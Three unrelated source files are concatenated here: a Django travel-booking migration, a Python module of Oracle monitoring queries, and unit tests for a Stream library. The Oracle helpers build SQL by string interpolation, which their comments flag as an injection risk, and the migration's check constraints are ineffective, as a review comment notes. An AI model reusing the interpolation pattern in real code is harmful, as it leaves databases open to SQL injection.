                # One hotel row per location (the FK doubles as the PK).
                ('location', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to='TravelBooking.locations')),
                ('price', models.IntegerField()),
                ('numRooms', models.IntegerField()),
                ('numAvail', models.IntegerField()),
            ],
        ),
        migrations.CreateModel(
            name='RES_HOTEL',
            fields=[
                ('resvKey', models.IntegerField(primary_key=True, serialize=False, unique=True)),
                ('custID', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='TravelBooking.customers')),
                ('hotelLocation', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='TravelBooking.locations')),
            ],
        ),
        migrations.CreateModel(
            name='RES_FLIGHT',
            fields=[
                ('resvKey', models.IntegerField(primary_key=True, serialize=False, unique=True)),
                ('custID', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='TravelBooking.customers')),
                ('flightNum', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='TravelBooking.flights')),
            ],
        ),
        migrations.CreateModel(
            name='RES_BUS',
            fields=[
                ('resvKey', models.IntegerField(primary_key=True, serialize=False, unique=True)),
                ('busLocation', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='TravelBooking.locations')),
                ('custID', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='TravelBooking.customers')),
            ],
        ),
        migrations.AddField(
            model_name='flights',
            name='ArivCity',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ArivCity', to='TravelBooking.locations'),
        ),
        migrations.AddField(
            model_name='flights',
            name='FromCity',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='FromCity', to='TravelBooking.locations'),
        ),
        # NOTE(review): this constraint checks balance == balance - 0, which is
        # always true for non-null values; the intent was presumably
        # balance >= 0 (balance__gte=0). Fixing it needs a new migration —
        # do not rewrite this applied one. Same pattern below for the price checks.
        migrations.AddConstraint(
            model_name='customers',
            constraint=models.CheckConstraint(check=models.Q(('balance', django.db.models.expressions.CombinedExpression(django.db.models.expressions.F('balance'), '-', django.db.models.expressions.Value(0)))), name='check_balance'),
        ),
        migrations.AddField(
            model_name='bus',
            name='location',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='TravelBooking.locations'),
        ),
        migrations.AddConstraint(
            model_name='hotels',
            constraint=models.CheckConstraint(check=models.Q(('price', django.db.models.expressions.CombinedExpression(django.db.models.expressions.F('price'), '-', django.db.models.expressions.Value(0)))), name='check_h_price'),
        ),
        migrations.AddConstraint(
            model_name='flights',
            constraint=models.CheckConstraint(check=models.Q(('price', django.db.models.expressions.CombinedExpression(django.db.models.expressions.F('price'), '-', django.db.models.expressions.Value(0)))), name='check_f_price'),
        ),
        migrations.AddConstraint(
            model_name='bus',
            constraint=models.CheckConstraint(check=models.Q(('price', django.db.models.expressions.CombinedExpression(django.db.models.expressions.F('price'), '-', django.db.models.expressions.Value(0)))), name='check_b_price'),
        ),
    ]
|
#!/bin/env python
#-*-coding:utf-8-*-
import MySQLdb
import string
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import ConfigParser
def get_item(data_dict, item):
    """Return data_dict[item], or None when the key is missing/unusable.

    Replaces a bare `except: pass` (which also swallowed KeyboardInterrupt
    and implicitly returned None) with a targeted, explicit handler.
    """
    try:
        return data_dict[item]
    except (KeyError, TypeError):
        return None
def get_parameters(conn):
    """Return a {name: value} dict of all v$parameter rows, or None on error."""
    curs = None
    try:
        curs = conn.cursor()
        curs.execute('select name,value from v$parameter')
        return {row[0]: row[1] for row in curs.fetchall()}
    except Exception as e:  # was Py2-only `except Exception,e`
        print(e)
        return None
    finally:
        # guard: conn.cursor() itself may have raised, leaving curs unbound
        if curs is not None:
            curs.close()
def get_sysstat(conn):
    """Return a {name: value} dict of all v$sysstat rows, or None on error."""
    curs = None
    try:
        curs = conn.cursor()
        curs.execute('select name,value value from v$sysstat')
        return {row[0]: row[1] for row in curs.fetchall()}
    except Exception as e:  # was Py2-only `except Exception,e`
        print(e)
        return None
    finally:
        if curs is not None:  # conn.cursor() may have raised before binding curs
            curs.close()
def get_instance(conn, field):
    """Return the value of `field` from v$instance, or '' on error.

    NOTE: `field` is %-interpolated into the SQL — callers must pass a
    trusted column name (SQL-injection risk otherwise).
    """
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("select %s from v$instance" % (field))
        return curs.fetchone()[0]
    except Exception as e:
        print(e)
        # was: result = '' assigned but never returned (fell through to None)
        return ''
    finally:
        if curs is not None:
            curs.close()
def get_database(conn, field):
    """Return the value of `field` from v$database, or '' on error.

    NOTE: `field` is %-interpolated into the SQL — trusted input only.
    """
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("select %s from v$database" % (field))
        return curs.fetchone()[0]
    except Exception as e:
        print(e)
        # was: result = '' assigned but never returned (fell through to None)
        return ''
    finally:
        if curs is not None:
            curs.close()
def get_version(conn):
    """Return the Oracle database version string, or None on error."""
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("select product,version from product_component_version where product like '%Database%'")
        # column 1 is the version; column 0 is the product name
        return curs.fetchone()[1]
    except Exception as e:
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_current_snap_id(conn, inst_id):
    """Return the latest AWR snapshot id for the instance, or None on error.

    NOTE: inst_id is %-interpolated into the SQL — trusted numeric input only.
    """
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("select max(snap_id) from wrm$_snapshot where instance_number = %s" % (inst_id))
        return curs.fetchone()[0]
    except Exception as e:
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_end_interval_time(conn, inst_id):
    """Return the end time of the latest AWR snapshot for the instance
    (as 'yyyy-mm-dd hh24:mi:ss'), or None on error."""
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("""select to_char(t.end_interval_time, 'yyyy-mm-dd hh24:mi:ss') from wrm$_snapshot t
            where t.snap_id in (select max(snap_id) from wrm$_snapshot)
            and t.instance_number = %s """ % (inst_id))
        return curs.fetchone()[0]
    except Exception as e:
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_sessions(conn):
    """Return the total session count from v$session, or None on error."""
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("select count(*) from v$session")
        return curs.fetchone()[0]
    except Exception as e:
        # was: `return null` (NameError — `null` is undefined) followed by an
        # unreachable `print e`; now log the error and return None explicitly
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_actives(conn):
    """Return the number of ACTIVE sessions, or None on error."""
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("select count(*) from v$session where STATUS='ACTIVE'")
        return curs.fetchone()[0]
    except Exception as e:
        # was: `return null` (NameError) + unreachable `print e`
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_waits(conn):
    """Return the count of sessions stuck on contention-type waits
    (library cache / cursor / latch / enqueue / log file), or None on error."""
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("select count(*) from v$session where event like 'library%' or event like 'cursor%' or event like 'latch%' or event like 'enq%' or event like 'log file%'")
        return curs.fetchone()[0]
    except Exception as e:
        # was: `return null` (NameError) + unreachable `print e`
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_dg_stats(conn):
    """Return 1 if an 'apply lag' row exists in v$dataguard_stats (i.e. this
    looks like a Data Guard standby), 0 if not, None on error."""
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("SELECT substr((SUBSTR(VALUE,5)),0,2)*3600 + substr((SUBSTR(VALUE,5)),4,2)*60 + substr((SUBSTR(VALUE,5)),7,2) AS seconds,VALUE FROM v$dataguard_stats a WHERE NAME ='apply lag'")
        row = curs.fetchone()  # renamed from `list` (shadowed the builtin)
        return 1 if row else 0
    except Exception as e:
        # was: `return null` (NameError) + unreachable `print e`
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_dg_delay(conn):
    """Return the Data Guard apply lag in seconds, '---' when no lag row
    exists, or None on error."""
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("SELECT substr((SUBSTR(VALUE,5)),0,2)*3600 + substr((SUBSTR(VALUE,5)),4,2)*60 + substr((SUBSTR(VALUE,5)),7,2) AS seconds,VALUE FROM v$dataguard_stats a WHERE NAME ='apply lag'")
        row = curs.fetchone()  # renamed from `list` (shadowed the builtin)
        return row[0] if row else '---'
    except Exception as e:
        # was: `return null` (NameError) + unreachable `print e`
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_sysdate(conn):
    """Return the DB server time formatted 'yyyymmddhh24miss', or None on error."""
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("select to_char(sysdate, 'yyyymmddhh24miss') from dual")
        return curs.fetchone()[0]
    except Exception as e:
        # was: `return null` (NameError) + unreachable `print e`
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_dg_p_info(conn, dest_id):
    """Return, for each redo thread, the most recent archived-log row shipped
    to `dest_id` (plus the current SCN/time), or None on error.

    NOTE: dest_id is %-interpolated into the SQL — trusted numeric input only.
    """
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("""select *
          from (select dest_id,
                       thread#,
                       sequence#+1,
                       archived,
                       applied,
                       current_scn,
                       to_char(scn_to_timestamp(current_scn), 'yyyy-mm-dd hh24:mi:ss') curr_db_time,
                       row_number() over(partition by thread# order by sequence# desc) rn
                  from v$archived_log t, v$database d
                 where t.dest_id = %s)
         where rn = 1 """ % (dest_id))
        return curs.fetchall()
    except Exception as e:
        # was: unreachable `print e` after `return None`; log before returning
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_dg_p_info_2(conn, dest_id):
    """Like get_dg_p_info, but joined with v$archive_dest so the result also
    carries the destination's transmit_mode. Returns rows or None on error.

    NOTE: dest_id is %-interpolated into the SQL — trusted numeric input only.
    """
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("""select *
          from (select t.dest_id,
                       transmit_mode,
                       thread#,
                       sequence#+1,
                       archived,
                       applied,
                       current_scn,
                       to_char(scn_to_timestamp(current_scn), 'yyyy-mm-dd hh24:mi:ss') curr_db_time,
                       row_number() over(partition by thread# order by sequence# desc) rn
                  from v$archived_log t, v$archive_dest a, v$database d
                 where t.dest_id = a.dest_id
                   and t.dest_id = %s)
         where rn = 1 """ % (dest_id))
        return curs.fetchall()
    except Exception as e:
        # was: unreachable `print e` after `return None`
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_log_archived_delay(conn, dest_id, thread_id):
    """Return the number of not-yet-archived logs for (dest_id, thread_id);
    0 when none, None on error."""
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("""select count(1) from v$archived_log where dest_id = %s and thread# = %s and archived= 'NO' group by dest_id """ % (dest_id, thread_id))
        row = curs.fetchone()  # renamed from `list` (shadowed the builtin)
        # GROUP BY yields no row at all when nothing is pending
        return row[0] if row else 0
    except Exception as e:
        # was: unreachable `print e` after `return None`
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_log_applied_delay(conn, dest_id, thread_id):
    """Return the number of not-yet-applied logs for (dest_id, thread_id);
    0 when none, None on error."""
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("""select count(1) from v$archived_log where dest_id = %s and thread# = %s and applied= 'NO' group by dest_id """ % (dest_id, thread_id))
        row = curs.fetchone()  # renamed from `list` (shadowed the builtin)
        # GROUP BY yields no row at all when nothing is pending
        return row[0] if row else 0
    except Exception as e:
        # was: unreachable `print e` after `return None`
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_redo_per_hour(conn):
    """Return (hour_label, redo_MB) for redo archived in the current hour
    (standby destinations excluded), or None on error."""
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("""select to_char(first_time, 'yyyy-mm-dd hh24')||':00' key_time,
               trunc(sum(blocks * block_size) / 1024 / 1024) redo_p_h
          from v$archived_log
         where to_char(first_time, 'yyyymmddhh24') = to_char(sysdate, 'yyyymmddhh24')
           and standby_dest = 'NO'
         group by to_char(first_time, 'yyyy-mm-dd hh24') """)
        return curs.fetchone()
    except Exception as e:  # was Py2-only `except Exception,e` / `print e`
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_db_time(conn, snap_id, inst_id):
    """Return (snap_id, end_time, dbtime_seconds, elapsed_seconds, rate) for
    the AWR interval ending at `snap_id` on instance `inst_id`, or None on error.

    NOTE: snap_id/inst_id are %-interpolated into the SQL — trusted numeric
    input only.
    """
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("""select snap_id, end_time, dbtime, elapsed, round(dbtime/elapsed, 2) as rate from (
        select n.stat_name as name,
               e.snap_id,
               to_char(te.end_interval_time,'yyyy-mm-dd hh24:mi:ss') as end_time,
               round((case when (e.value - b.value) > 0 then e.value - b.value else e.value end) / 1000 / 1000, 2) as dbtime,
               (to_date(to_char(te.end_interval_time,'yyyy-mm-dd hh24:mi:ss'),'yyyy-mm-dd hh24:mi:ss') -
               to_date(to_char(tb.end_interval_time,'yyyy-mm-dd hh24:mi:ss'),'yyyy-mm-dd hh24:mi:ss'))*86400 as elapsed
          from wrh$_sys_time_model e, wrh$_sys_time_model b, wrh$_stat_name n, wrm$_snapshot tb, wrm$_snapshot te
         where e.stat_id = n.stat_id
           and b.stat_id = n.stat_id
           and b.snap_id = e.snap_id - 1
           and e.snap_id = %s
           and e.snap_id = te.snap_id and e.instance_number = te.instance_number
           and b.snap_id = tb.snap_id and b.instance_number = tb.instance_number
           and e.instance_number=b.instance_number
           and e.instance_number=%s
           and n.stat_name = 'DB time') tmp """ % (snap_id, inst_id))
        return curs.fetchone()
    except Exception as e:  # was Py2-only `except Exception,e` / `print e`
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_dg_s_ms(conn):
    """Return (thread#, sequence#, block#, delay_mins) for the MRP0 apply
    process on a standby, or None when absent / on error."""
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("""select ms.thread#,
               ms.sequence#,
               ms.block#,
               ms.delay_mins
          from v$managed_standby ms
         where ms.process in ('MRP0')
           and ms.sequence# <> 0 """)
        return curs.fetchone()
    except Exception as e:
        # was: unreachable `print e` after `return None`
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_dg_s_al(conn, scn):
    """Return (thread#, sequence#) of the archived log covering `scn`,
    or None when not found / on error.

    NOTE: scn is %-interpolated into the SQL — trusted numeric input only.
    """
    curs = None
    try:
        curs = conn.cursor()
        curs.execute(""" select thread#,sequence# from v$archived_log where first_change#<%s and next_change#>=%s """ % (scn, scn))
        return curs.fetchone()
    except Exception as e:
        # was: unreachable `print e` after `return None`
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_dg_s_rate(conn):
    """Return the most recent 'Average Apply Rate' row from
    v$recovery_progress, or None when absent / on error."""
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("""select *
          from (select rp.sofar avg_apply_rate
                  from v$recovery_progress rp
                 where rp.item = 'Average Apply Rate'
                 order by start_time desc)
         where rownum < 2 """)
        return curs.fetchone()
    except Exception as e:
        # was: unreachable `print e` after `return None`
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_dg_s_mrp(conn):
    """Return 1 when an MRP0 (managed recovery) session exists, else 0
    (also 0 on error — callers treat errors as 'not running')."""
    curs = None
    try:
        curs = conn.cursor()
        # the '%(MRP0)' is a SQL LIKE wildcard, not Python formatting
        curs.execute("""select status from gv$session where program like '%(MRP0)' """)
        row = curs.fetchone()  # renamed from `list` (shadowed the builtin)
        return 1 if row else 0
    except Exception as e:
        # was: unreachable `print e` after `return 0`
        print(e)
        return 0
    finally:
        if curs is not None:
            curs.close()
def get_standby_redo_count(conn):
    """Return the number of standby redo logs (v$standby_log); 0 on error."""
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("""select count(1) from v$standby_log """)
        return curs.fetchone()[0]
    except Exception as e:
        # was: unreachable `print e` after `return 0`
        print(e)
        return 0
    finally:
        if curs is not None:
            curs.close()
def get_time_by_scn(conn, scn):
    """Return the timestamp string for `scn` via scn_to_timestamp, or None.

    Errors are deliberately silent (the original had its print commented
    out): old SCNs fall out of the mapping window and raise ORA-08181.
    NOTE: scn is %-interpolated into the SQL — trusted numeric input only.
    """
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("""select to_char(scn_to_timestamp(%s), 'yyyy-mm-dd hh24:mi:ss') curr_db_time from v$database """ % (scn))
        res = curs.fetchone()
        return res[0] if res else None
    except Exception:
        return None
    finally:
        if curs is not None:
            curs.close()
def get_time_from_restorepoint(conn, scn):
    """Return the creation time of the restore point at `scn`, or None.

    NOTE: scn is %-interpolated into the SQL — trusted numeric input only.
    """
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("""select to_char(time, 'yyyy-mm-dd hh24:mi:ss') curr_db_time from v$restore_point where scn = %s """ % (scn))
        res = curs.fetchone()
        return res[0] if res else None
    except Exception as e:  # was Py2-only `except Exception,e` / `print e`
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_pri_id_by_server(conn, id):
    """Return the partner database id from db_cfg_oracle_dg for server `id`
    (standby id before switchover, primary id after), or None.

    `id` shadows the builtin, but it is part of the public signature and is
    kept for caller compatibility.
    NOTE: id is %-interpolated into the SQL — trusted numeric input only.
    """
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("""select CASE is_switch
                   WHEN 0 THEN standby_db_id
                   ELSE primary_db_id
               END as sta_id
          from db_cfg_oracle_dg
         where primary_db_id = %s or standby_db_id = %s """ % (id, id))
        res = curs.fetchone()
        return res[0] if res else None
    except Exception as e:  # was Py2-only `except Exception,e` / `print e`
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_earliest_fbscn(conn):
    """Return the smallest restore-point SCN (earliest flashback target),
    or None on error."""
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("""select min(scn) from v$restore_point """)
        return curs.fetchone()[0]
    except Exception as e:
        # was: unreachable `print e` after `return None`
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_earliest_fbtime(conn, flashback_retention):
    """Return the earliest usable flashback time (+30 min margin, as text)
    within the retention window; the string 'null' when no restore point
    qualifies; None on error.

    NOTE: flashback_retention (minutes) is %-interpolated — trusted input only.
    """
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("""select to_char(min(time) + 1/48, 'yyyy-mm-dd hh24:mi:ss') mintime from v$restore_point where time > sysdate -%s/24/60 """ % (flashback_retention))
        mintime = curs.fetchone()
        # min(time) is SQL NULL (Python None) when no row is in the window
        return mintime[0] if mintime[0] else 'null'
    except Exception as e:  # was Py2-only `except Exception,e` / `print e`
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_last_fbtime(conn):
    """Return the newest restore-point time as 'yyyymmddhh24miss', the
    string 'null' when there are no restore points, or None on error."""
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("""select to_char(max(time), 'yyyymmddhh24miss') maxtime from v$restore_point """)
        lasttime = curs.fetchone()
        # max(time) is SQL NULL (Python None) when the view is empty
        return lasttime[0] if lasttime[0] else 'null'
    except Exception as e:  # was Py2-only `except Exception,e` / `print e`
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_flashback_space_used(conn):
    """Return the total percent of the flash recovery area in use
    (0 when unavailable/NULL), or None on error."""
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("""select sum(percent_space_used) from v$flash_recovery_area_usage """)
        fb_space = curs.fetchone()
        result = fb_space[0] if fb_space else 0
        # sum() over an empty view yields SQL NULL; normalize to 0
        if result == '' or result is None:
            result = 0
        return result
    except Exception as e:  # was Py2-only `except Exception,e` / `print e`
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_restorepoint(conn, flashback_retention):
    """Return restore-point names within the retention window (newest name
    first), or None on error.

    NOTE: flashback_retention (minutes) is %-interpolated — trusted input only.
    """
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("select name from v$restore_point where time > sysdate -%s/60/24 order by name desc " % (flashback_retention))
        return curs.fetchall()
    except Exception as e:
        # was: unreachable `print e` after `return None`; also no longer
        # shadows the builtin `list`
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_expire_restore_list(conn, flashback_retention):
    """Return names of restore points older than the retention window
    (candidates for deletion), or None on error.

    NOTE: flashback_retention (minutes) is %-interpolated — trusted input only.
    """
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("select name from v$restore_point where time < sysdate - %s/60/24 " % (flashback_retention))
        return curs.fetchall()
    except Exception as e:
        # was: unreachable `print e` after `return None`
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_tablespace(conn):
    """Return per-tablespace rows (name, status, mgmt, max MB, current MB,
    max used %) ordered by max_used desc, or None on error.

    Autoextensible files count at MAXBYTES, fixed files at BYTES.
    """
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("""select tpsname,status,mgr,max_size,curr_size, max_used
          from (SELECT d.tablespace_name tpsname,
                       d.status status,
                       d.segment_space_management mgr,
                       TO_CHAR(NVL(trunc(A.maxbytes / 1024 / 1024), 0), '99999990') max_size,
                       TO_CHAR(NVL(trunc(a.bytes / 1024 / 1024), 0), '99999990') curr_size,
                       TO_CHAR(NVL((a.bytes - NVL(f.bytes, 0)) / a.bytes * 100, 0),
                               '990D00') c_used,
                       TO_CHAR(NVL((a.bytes - NVL(f.bytes, 0)) / a.maxbytes * 100, 0),
                               '990D00') max_used
                  FROM sys.dba_tablespaces d,
                       (SELECT tablespace_name,
                               sum(bytes) bytes,
                               SUM(case autoextensible
                                     when 'NO' then
                                      BYTES
                                     when 'YES' then
                                      MAXBYTES
                                     else
                                      null
                                   end) maxbytes
                          FROM dba_data_files
                         GROUP BY tablespace_name) a,
                       (SELECT tablespace_name,
                               SUM(bytes) bytes,
                               MAX(bytes) largest_free
                          FROM dba_free_space
                         GROUP BY tablespace_name) f
                 WHERE d.tablespace_name = a.tablespace_name
                   AND d.tablespace_name = f.tablespace_name(+))
         order by max_used desc """)
        return curs.fetchall()
    except Exception as e:
        # was: unreachable `print e` after `return None`; also no longer
        # shadows the builtin `list`
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_diskgroup(conn):
    """Return ASM disk-group rows (name, state, type, total MB, free MB,
    used %), or None on error."""
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("""select name,
               state,
               type,
               total_mb,
               free_mb,
               trunc(((total_mb - free_mb) / total_mb) * 100, 2) used_rate
          from v$asm_diskgroup """)
        return curs.fetchall()
    except Exception as e:
        # was: unreachable `print e` after `return None`
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
def get_tables(conn):
    """Return (owner, 'owner.table_name') rows for every table in dba_tables,
    or None on error."""
    curs = None
    try:
        curs = conn.cursor()
        curs.execute("select owner, owner || '.' || table_name from dba_tables ")
        return curs.fetchall()
    except Exception as e:
        # was: unreachable `print e` after `return None`; also no longer
        # shadows the builtin `list`
        print(e)
        return None
    finally:
        if curs is not None:
            curs.close()
|
from unittest import TestCase
from shared.BaseUnitTest import BaseUnitTest
from shared.products import get_products
from shared.users import get_users
import cProfile
import pstats
def profile_method(fn):
    """Run the zero-argument callable `fn` under cProfile, print the profile
    stats to stdout, and return whatever `fn` returned."""
    prof = cProfile.Profile()
    prof.enable()
    result = fn()
    prof.disable()
    pstats.Stats(prof).print_stats()
    return result
# Shared fixture: three sample user records exercised by the README tests
# below (salaries chosen so filters at 80000/100000 split the set; Jasen is
# the only Male, so male-salary reductions yield exactly 78373).
users = [
    {
        "id": 1,
        "first_name": "Mandy",
        "last_name": "Gowan",
        "email": "mgowan0@aol.com",
        "gender": "Female",
        "loves": ['Soccer', 'Cricket', 'Golf'],
        "salary": 119885
    },
    {
        "id": 2,
        "first_name": "Janessa",
        "last_name": "Cotterell",
        "email": "jcotterell1@aol.com",
        "gender": "Female",
        "loves": ['Cricket'],
        "salary": 107629
    },
    {
        "id": 6,
        "first_name": "Jasen",
        "last_name": "Franzini",
        "email": "jfranzini5@aol.com",
        "gender": "Male",
        "loves": ['Soccer', 'Golf'],
        "salary": 78373
    }
]
from streams.Stream import Stream
from streams.operations.operators import item
class TestStreamReadMe(BaseUnitTest):
    """Executable README examples for the Stream API.

    Exercises filter/map/flatmap/reduce/skip/take/peek/distinct both with
    plain lambdas and with the `item` operator DSL, against the module-level
    `users` fixture and the shared get_users()/get_products() datasets.
    Expected lists are order-exact — they pin the datasets' iteration order.
    """

    def test_example_lambda(self):
        """Baseline: builtin map/filter with lambdas (no Stream).
        NOTE(review): prints only — no assertion."""
        results = list(map(lambda user: user['first_name'], filter(lambda user: user['salary'] > 100000, users)
                           ))
        # ['Mandy', 'Janessa']
        print(results)

    def test_example_1(self):
        """Chained filter/filter/map with lambdas."""
        results = (Stream
                   .create(users)
                   .filter(lambda user: user['salary'] > 80000)
                   # NOTE(review): lambda arg named `product` but receives a user dict
                   .filter(lambda product: product['gender'] == 'Female')
                   .map(lambda user: user['first_name'])
                   .asList())
        # ['Mandy', 'Janessa']
        print(results)
        self.assertEqual(results, ['Mandy', 'Janessa'])

    def test_example_1a(self):
        """Same result without the gender filter (Jasen's 78373 < 80000)."""
        results = (Stream
                   .create(users)
                   .filter(lambda user: user['salary'] > 80000)
                   .map(lambda user: user['first_name'])
                   .asList())
        # ['Mandy', 'Janessa']
        print(results)
        self.assertEqual(results, ['Mandy', 'Janessa'])

    def test_example_1_with_operators(self):
        """Same pipeline written with the `item` operator DSL."""
        results = (Stream
                   .create(users)
                   .filter(item['salary'] > 80000)
                   .filter(item['gender'] == 'Female')
                   .map(item['first_name'])
                   .asList())
        # ['Mandy', 'Janessa']
        print(results)
        self.assertEqual(results, ['Mandy', 'Janessa'])

    def test_reduce_operator(self):
        """reduce via item[...].sum — Jasen is the only Male."""
        sum_of_salaries = (Stream
                           .create(users)
                           .filter(item['gender'] == 'Male')
                           .reduce(item['salary'].sum)
                           .asSingle()
                           )
        # 78373
        self.assertEqual(sum_of_salaries, 78373)

    def test_flatmap_operator_loves(self):
        """flatmap + distinct over the 'loves' lists (operator DSL)."""
        results = (Stream
                   .create(users)
                   .flatmap(item['loves'])
                   .distinct()
                   .asList())
        self.assertListEqualsInAnyOrder(results, ['Cricket', 'Golf', 'Soccer'])

    def test_operator_skip_take(self):
        """skip(1).take(1) selects exactly the second user."""
        results = (Stream
                   .create(users)
                   .skip(1)
                   .take(1)
                   .map(item['first_name'])
                   .asList())
        self.assertListEqualsInAnyOrder(results, ['Janessa'])

    # TODO Catch needs rework
    # def test_operator_catch(self):
    #     results = (Stream
    #                .create(users)
    #                .filter(lambda user: user['gender'] == 'Male')
    #                .map(lambda user: user['salaryv'])
    #                .catchAll(lambda ex: print(ex))
    #                .asList()
    #                )
    #
    #     self.assertListEqualsInAnyOrder(results, ['Janessa'])

    def test_operator_peek(self):
        """peek with a lambda and with item.print; result unaffected."""
        results = (Stream
                   .create(users)
                   .peek(lambda data: print("User", data))
                   .map(item['first_name'])
                   .asList())
        print(results)
        results = (Stream
                   .create(users)
                   .peek(item.print)
                   .map(item['first_name'])
                   .asList())
        self.assertListEqualsInAnyOrder(results, ['Janessa', 'Jasen', 'Mandy'])

    def test_example_2(self):
        """flatmap + distinct with lambdas.
        NOTE(review): prints only — no assertion."""
        results = (Stream
                   .create(users)
                   .flatmap(lambda user: user['loves'])
                   .distinct()
                   .asList())
        # ['Cricket', 'Golf', 'Soccer']
        print(results)

    def test_example_3(self):
        """skip/take with a lambda map."""
        results = (Stream
                   .create(users)
                   .skip(1)
                   .take(1)
                   .map(lambda user: user['first_name'])
                   .asList())
        # ['Janessa']
        self.assertEqual(results, ['Janessa'])
        print(results)

    def test_flatmap(self):
        """flatmap without distinct keeps duplicates, in source order."""
        results = (Stream
                   .create(users)
                   .flatmap(lambda user: user['loves'])
                   .asList())
        print(results)
        self.assertEqual(results, ['Soccer', 'Cricket', 'Golf', 'Cricket', 'Soccer', 'Golf'])
        # ['Soccer', 'Cricket', 'Golf', 'Cricket', 'Soccer', 'Golf']

    def test_fromList_with_map(self):
        """map over the shared get_users() dataset; pins its exact order."""
        # filter(lambda user: user['gender'] == gender, users)
        results = Stream.create(get_users()).map(lambda user: user['gender']).asList()
        print("results", results)
        self.assertIsNotNone(results)
        self.assertEqual(results,
                         ['Female', 'Female', 'Female', 'Female', 'Female', 'Male', 'Male', 'Male', 'Male', 'Male',
                          'Female', 'Male', 'Agender', 'Polygender', 'Male', 'Male', 'Polygender', 'Female', 'Male',
                          'Male', 'Non-binary', 'Polygender', 'Male', 'Non-binary', 'Male'])

    def test_fromList_with_map_filter(self):
        """map then filter down to the single 'Agender' entry."""
        # filter(lambda user: user['gender'] == gender, users)
        results = Stream.create(get_users()).map(lambda user: user['gender']).filter(
            lambda g: g == 'Agender').asList()
        print("results", results)
        self.assertIsNotNone(results)
        self.assertEqual(results, ['Agender'])

    def test_fromList_with_map_filter_with_profile(self):
        """Same pipeline run under profile_method (cProfile wrapper)."""
        current_method = lambda: Stream.create(get_users()).map(lambda user: user['gender']).filter(
            lambda g: g == 'Female').asList()
        results = profile_method(current_method)
        print("results", results)
        self.assertIsNotNone(results)
        self.assertEqual(results, ['Female', 'Female', 'Female', 'Female', 'Female', 'Female', 'Female'])

    def test_fromList_with_map_filter_with_clothing_overallrating(self):
        """Clothing products rated > 3, mapped to names (profiled)."""
        is_clothing = lambda product: product['category'] == 'Clothing'
        is_rating_greater_than_three = lambda product: product['overAllRating'] > 3
        name_from_product = lambda product: product['name']
        current_method = lambda: (Stream.create(get_products())
                                  .filter(is_clothing)
                                  .filter(is_rating_greater_than_three)
                                  .map(name_from_product)
                                  .asList())
        results = profile_method(current_method)
        print("results", results)
        self.assertIsNotNone(results)
